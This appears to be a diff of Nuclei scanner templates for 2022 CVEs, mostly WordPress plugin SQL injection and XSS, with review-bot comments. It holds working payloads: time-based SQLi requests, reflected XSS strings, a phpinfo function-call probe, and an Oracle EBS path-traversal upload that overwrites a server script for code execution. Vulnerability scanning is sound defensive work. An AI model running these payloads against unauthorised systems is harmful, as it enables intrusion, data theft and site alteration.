cve-id: CVE-2022-0786
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,cve,cve2022,wpscan
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Doctor details")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
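Review bot: The request-target on the GET line mixes percent-encoded braces with raw double quotes, `clinic_id=%7B"id":"1"%7D`; a literal `"` is not a valid URI character and some front-ends or WAFs answer 400 before admin-ajax.php is reached, so encode it as `clinic_id=%7B%22id%22:%221%22%7D`. The injected clause (`+AND+(SELECT+42+...`) is already plus-encoded, so those quotes are the only raw characters left in the line. As with the other time-based checks added here, `duration>=6` on its own also fires on a slow host; a baseline request without the SLEEP would make the verdict more reliable.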
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0788
|
||||
|
||||
info:
|
||||
name: WP Fundraising Donation and Crowdfunding Platform < 1.5.0 - Unauthenticated SQLi
|
||||
name: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The WP Fundraising Donation and Crowdfunding Platform WordPress plugin before 1.5.0 does not sanitise and escape a parameter before using it in a SQL statement via one of it's REST route, leading to an SQL injection exploitable by unauthenticated users.
|
||||
WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
|
||||
- https://wordpress.org/plugins/wp-fundraising-donation/
|
||||
|
@ -37,3 +37,5 @@ requests:
|
|||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "Invalid payment.")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0817
|
||||
|
||||
info:
|
||||
name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
|
||||
name: WordPress BadgeOS <=3.7.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
|
||||
WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
|
||||
- https://wordpress.org/plugins/badgeos/
|
||||
|
@ -39,3 +39,5 @@ requests:
|
|||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "badgeos-arrange-buttons")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2022-0826
|
||||
|
||||
info:
|
||||
name: WordPress WP Video Gallery <=1.7.1 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5
|
||||
- https://wordpress.org/plugins/wp-video-gallery-free/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0826
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0826
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Registred videos :")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
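Review bot: `verified: true` in the metadata block is an unquoted boolean, whereas every other template added in this commit writes `verified: "true"` and the commit itself rewrites two existing templates (CVE-2022-0346, CVE-2022-23854) from `true` to `"true"`; change it to `verified: "true"` so the field has one type across the repository. The `@timeout: 15s` also leaves nine seconds of slack over the `duration>=6` threshold where CVE-2022-0784 and CVE-2022-0786 use `10s`; either unify the value or add a short comment saying why this endpoint needs the longer budget.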
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0867
|
||||
|
||||
info:
|
||||
name: ARPrice Lite < 3.6.1 - Unauthenticated SQLi
|
||||
name: WordPress ARPrice <3.6.1 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users.
|
||||
WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
|
||||
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
|
||||
|
@ -42,3 +42,5 @@ requests:
|
|||
- 'contains(content_type_1, "text/html")'
|
||||
- 'contains(body_2, "ArpPriceTable")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2022-0948
|
||||
|
||||
info:
|
||||
name: WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
|
||||
- https://wordpress.org/plugins/woc-order-alert/
|
||||
- https://plugins.trac.wordpress.org/changeset/2707223
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0948
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0948
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /?rest_route=/olistener/new HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
content-type: application/json
|
||||
|
||||
{"id":" (SLEEP(6))#"}
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_1>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(content_type_1, "application/json")'
|
||||
- 'contains(body_2, "olistener-action.olistener-controller")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1007
|
||||
|
||||
info:
|
||||
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
|
||||
name: WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting
|
||||
author: 8arthur
|
||||
severity: medium
|
||||
description: |
|
||||
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
|
||||
WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
|
||||
- https://wordpress.org/plugins/advanced-booking-calendar/
|
||||
|
@ -42,3 +42,5 @@ requests:
|
|||
- "contains(all_headers_2, 'text/html')"
|
||||
- "status_code_2 == 200"
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1057
|
||||
|
||||
info:
|
||||
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
|
||||
name: WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
|
||||
WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
|
||||
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
|
||||
|
@ -33,3 +33,5 @@ requests:
|
|||
- 'status_code == 500'
|
||||
- 'contains(body, "been a critical error")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2022-1168
|
||||
|
||||
info:
|
||||
name: JobSearch < 1.5.1 - Cross-Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
There is a Cross-Site Scripting vulnerability in the JobSearch WP JobSearch WordPress plugin before 1.5.1.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1168
|
||||
- https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-1168
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: inurl:"wp-content/plugins/wp-jobsearch"
|
||||
verified: "true"
|
||||
tags: wp-jobsearch",wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<img src=x onerror=alert(domain)>"
|
||||
- "wp-jobsearch"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 404
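Review bot: The tags line carries a stray quote, `tags: wp-jobsearch",wpscan,...`, so the first tag becomes `wp-jobsearch"` and `-tags wp-jobsearch` will not select this template; it should read `tags: wp-jobsearch,wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss`. The description is a bare one-liner (`There is a Cross-Site Scripting vulnerability in the JobSearch WP JobSearch WordPress plugin before 1.5.1.`) without the parameter name or impact sentence the other XSS templates in this commit carry; `search_title` is the reflected parameter visible in the request path, so naming it there is grounded. Matching the payload on a `404` response is presumably deliberate because the plugin path is not a real page; a one-line comment on the status matcher saying so would stop a later editor from "fixing" it to 200.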
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2022-1595
|
||||
|
||||
info:
|
||||
name: WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b
|
||||
- https://wordpress.org/plugins/hc-custom-wp-admin-url/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1595
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2022-1595
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
HEAD /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: valid_login_slug=1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "Location: ([a-zA-Z0-9_.\\/-]+)"
|
||||
- "wordpress_"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
# Enhanced by md on 2023/01/06
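Review bot: The `Location:` regex character class `[a-zA-Z0-9_.\\/-]` contains no `:`, `?` or `=`, so for an absolute redirect such as `Location: https://host/secret-slug` it captures only `https`, and the matcher degenerates into "any 302 carrying a Location header" plus a `wordpress_` header fragment (presumably the `wordpress_test_cookie` Set-Cookie), which is not unique to the vulnerable plugin. Widening the class and exposing the capture as an extractor puts the leaked login URL into the finding, where a reader can see at once whether it differs from the stock `/wp-login.php`. A short comment on the `Cookie: valid_login_slug=1` line explaining that the plugin trusts this cookie to reveal the slug would also help the next maintainer.
```yaml
    matchers:
      - type: regex
        part: header
        regex:
          - "Location: ([a-zA-Z0-9_.:\\/?=&%-]+)"
          - "wordpress_"
        condition: and
      # … unchanged: status matcher …

    extractors:
      - type: regex
        part: header
        group: 1
        regex:
          - "Location: ([a-zA-Z0-9_.:\\/?=&%-]+)"
```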
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2022-1883
|
||||
|
||||
info:
|
||||
name: Terraboard < 2.2.0 - SQL Injection
|
||||
name: Terraboard <2.2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0.
|
||||
Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
|
||||
- https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc
|
||||
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1916
|
||||
|
||||
info:
|
||||
name: Active Products Tables for WooCommerce < 1.0.5 - Cross Site Scripting
|
||||
name: WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting.
|
||||
WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1916
|
||||
|
@ -44,3 +44,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/13
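Review bot: The rewritten description has two typos that will appear verbatim in the generated markdown: a doubled period in `contains a cross-site scripting vulnerability..` and a comma splice in `the response of an AJAX action, An attacker can inject`; they should read `vulnerability.` and `AJAX action. An attacker can inject`. The rewrite also drops the original's note that the action is reachable by both unauthenticated and authenticated users, which is the detail that justifies an unauthenticated scan; keeping `(available to unauthenticated users)` in the new sentence preserves it.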
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1933
|
||||
|
||||
info:
|
||||
name: CDI < 5.1.9 - Cross Site Scripting
|
||||
name: WordPress CDI <5.1.9 - Cross Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting.
|
||||
WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf
|
||||
- https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/13
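Review bot: The new name keeps `Cross Site Scripting` unhyphenated while the sibling rename for CVE-2022-1916 in this same commit uses `Cross-Site Scripting`, and the description directly below already says `cross-site scripting`; use `name: WordPress CDI <5.1.9 - Cross-Site Scripting` so the two templates sort and grep alike. As in CVE-2022-1916, the rewrite also removes the `(available to both unauthenticated and authenticated users)` qualifier; that is the fact that makes the check unauthenticated and is worth keeping in the new sentence.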
|
||||
|
|
|
@ -0,0 +1,76 @@
|
|||
id: CVE-2022-21587
|
||||
|
||||
info:
|
||||
name: Oracle EBS Unauthenticated - Remote Code Execution
|
||||
author: rootxharsh,iamnoooob
|
||||
severity: critical
|
||||
description: |
|
||||
Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator.
|
||||
reference:
|
||||
- https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
|
||||
- https://www.oracle.com/security-alerts/cpuoct2022.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-21587
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-21587
|
||||
tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
|
||||
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
Content-Disposition: form-data; name="bne:uueupload"
|
||||
|
||||
TRUE
|
||||
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
|
||||
|
||||
begin 664 test.zip
|
||||
M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO
|
||||
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
|
||||
M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G
|
||||
M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R
|
||||
M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0#
|
||||
M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN
|
||||
M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R
|
||||
G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````
|
||||
`
|
||||
end
|
||||
------WebKitFormBoundaryZsMro0UsAQYLDZGv--
|
||||
|
||||
- |
|
||||
GET /OA_CGI/FNDWRR.exe HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
|
||||
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
Content-Disposition: form-data; name="bne:uueupload"
|
||||
|
||||
TRUE
|
||||
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
||||
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
|
||||
|
||||
begin 664 test.zip
|
||||
M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO
|
||||
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
|
||||
M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P``````````
|
||||
M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA
|
||||
M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`
|
||||
(``!B````````
|
||||
`
|
||||
end
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- Nuclei-CVE-2022-21587
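Review bot: The `oast` tag is set but the template never references `{{interactsh-url}}`; the check is entirely in-band on `body_2`, so the tag misleads users who include or exclude OAST templates and should be dropped from `tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth`. The larger concern is the side effect: judging from the repeated `+BXO+BXO` (`../../`) runs in the uuencoded archives and the follow-up `GET /OA_CGI/FNDWRR.exe`, the first upload appears to overwrite a script inside the EBS installation via path traversal, and the third request uploads a second, near-empty archive to the same entry rather than restoring the original content, so a successful scan leaves the target altered. That deserves an explicit sentence in the description and a `# NOTE:` above the third request, and ideally a payload that creates a new file instead of replacing an existing one. If the traversal path embeds a fixed install directory name, the template will also silently miss installs with a different layout, which is worth stating in the description.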
|
|
@ -5,12 +5,12 @@ info:
|
|||
author: EvergreenCartoons
|
||||
severity: medium
|
||||
description: |
|
||||
A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim's browser in the context of their session within J-Web
|
||||
Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
|
||||
reference:
|
||||
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
|
||||
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
|
||||
- https://kb.juniper.net/JSA69899
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -43,3 +43,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/13
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2022-2314
|
||||
|
||||
info:
|
||||
name: VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The VR Calendar WordPress plugin through 2.3.2 lets any user execute arbitrary PHP functions on the site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82
|
||||
- https://wordpress.org/plugins/vr-calendar-sync/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-2314
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-2314
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: rce,unauth,wpscan,cve,cve2022,wp,vr-calendar-sync,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- "phpinfo"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- "vrc-calendar"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
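Review bot: The name says `VR Calendar < 2.3.2` while the description says the plugin `through 2.3.2` is affected, so the two disagree on whether 2.3.2 itself is vulnerable; check the wpscan entry, make them agree, and adopt the `WordPress <Plugin> <=version - ...` form the other renames in this commit use (e.g. `name: WordPress VR Calendar <=2.3.2 - Unauthenticated Arbitrary Function Call` if 2.3.2 is affected). The classification block also has no `cwe-id`, unlike the neighbouring templates. The `vrc_cmd=phpinfo` probe executes a function on the target and writes its full configuration into the scan output; a one-line comment explaining why phpinfo was chosen as the proof (recognisable `PHP Version` banner, no state change) would help reviewers judge how intrusive the template is.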
|
|
@ -1,20 +1,25 @@
|
|||
id: CVE-2022-23854
|
||||
|
||||
info:
|
||||
name: AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal
|
||||
name: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
description: |
|
||||
